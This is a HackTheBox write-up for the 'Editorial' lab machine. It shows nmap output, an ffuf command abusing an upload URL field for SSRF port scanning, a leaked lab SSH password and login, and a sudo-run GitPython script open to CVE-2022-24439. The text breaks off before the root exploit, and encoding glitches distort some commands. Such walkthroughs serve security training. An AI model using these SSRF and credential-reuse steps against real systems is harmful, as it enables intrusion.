Editorial is an easy-difficulty linux machine from HackTheBox. I initially deals with a file upload feature manipulation and SSRF abuse to be able to enumerate internal service running on specific ports and to be able to exfiltrate data from an internal api endpoint to get our user flag. Finally dealing with CVE-2022-24439 which is an RCE in GitPython for version below 3.1.30 that will allow us to take over the whole system.ssss
PS C:\Users\0xkujen> nmap -A-Pn10.129.129.83 Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-1902:57 Arabian Standard Time NSOCK ERROR [0.2690s] ssl_init_helper(): OpenSSL legacy provider failed to load.
Nmap scan report for10.129.129.83 Host is up (0.23s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2560dedb29ce253fbd4c8c1196e7580d864 (ECDSA) |_ 2560fb9a7510e00d57b5b7c5fbf2bed53a0 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://editorial.htb |_http-server-header: nginx/1.18.0 (Ubuntu) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.93%E=4%D=10/19%OT=22%CT=1%CU=38554%PV=Y%DS=2%DC=T%G=Y%TM=6712E8 OS:1F%P=i686-pc-windows-windows)SEQ(SP=103%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS= OS:A)SEQ(CI=Z%II=I)OPS(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54 OS:EST11NW7%O5=M54EST11NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88% OS:W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF= OS:Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z% OS:F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y OS:%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%R OS:D=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)I OS:E(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 3389/tcp) HOP RTT ADDRESS 1125.00 ms 10.10.16.1 2265.00 ms 10.129.129.83
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in45.59 seconds
We can see that we both have a 22 ssh port open and an exposed web application on port 80. We access the web application and we are redirected to editorial.htb, so letâs add that entry to our /etc/hosts file.
Letâs try replacing the âbookurlâ with local hostnames to try and enumerates services running on internal ports. I ran this command after saving the request to a file .\ffuf.exe -u http://editorial.htb/upload-cover -X POST -request requestt.txt -w ports.txt -fs 61 and got the port 5000. Letâ make a request to it and see what we have:
Web application
We navigate to the provided file and find this interesting data under:
1 2
{"messages":[{"promotions":{"description":"Retrieve a list of all the promotions in our library.","endpoint":"/api/latest/metadata/messages/promos","methods":"GET"}},{"coupons":{"description":"Retrieve the list of coupons to use in our library.","endpoint":"/api/latest/metadata/messages/coupons","methods":"GET"}},{"new_authors":{"description":"Retrieve the welcome message sended to our new authors.","endpoint":"/api/latest/metadata/messages/authors","methods":"GET"}},{"platform_use":{"description":"Retrieve examples of how to use the platform.","endpoint":"/api/latest/metadata/messages/how_to_use_platform","methods":"GET"}}],"version":[{"changelog":{"description":"Retrieve a list of all the versions and updates of the api.","endpoint":"/api/latest/metadata/changelog","methods":"GET"}},{"latest":{"description":"Retrieve the last version of api.","endpoint":"/api/latest/metadata","methods":"GET"}}]}
We can see that we have some API endpoints, we access /api/latest/metadata/messages/authors like we did preivously and we get some really amazing data:
1 2
{"template_mail_message":"Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, Editorial Tiempo Arriba Team."}
We got ssh credentials! Letâs use those and get our user flag:
1 2 3 4 5
dev@editorial:~$ id uid=1001(dev) gid=1001(dev) groups=1001(dev) dev@editorial:~$ cat user.txt 1b090a893289c3****************** dev@editorial:~$
Privilege Escalation to root
We can see from our home directory that thereâs another âprodâ user. We also have a â.gitâ directory on the âappsâ directory on âdevââs home directory. So letâs try to check other git diffs for any other credentials:
prod@editorial:/home/dev/apps/.git$ sudo -l [sudo] password for prod: Matching Defaults entries for prod on editorial: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User prod may run the following commands on editorial: (root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py * prod@editorial:/home/dev/apps/.git$ cat /opt/internal_apps/clone_changes/clone_prod_change.py #!/usr/bin/python3
import os import sys from git import Repo
os.chdir('/opt/internal_apps/clone_changes')
url_to_clone = sys.argv[1]
r = Repo.init('', bare=True) r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"]) prod@editorial:/home/dev/apps/.git$
We can see that we can run the above script as root. Also checking this, we can see that GitPython is vulnerable to CVE-2022-24439 . So letâs get our root:
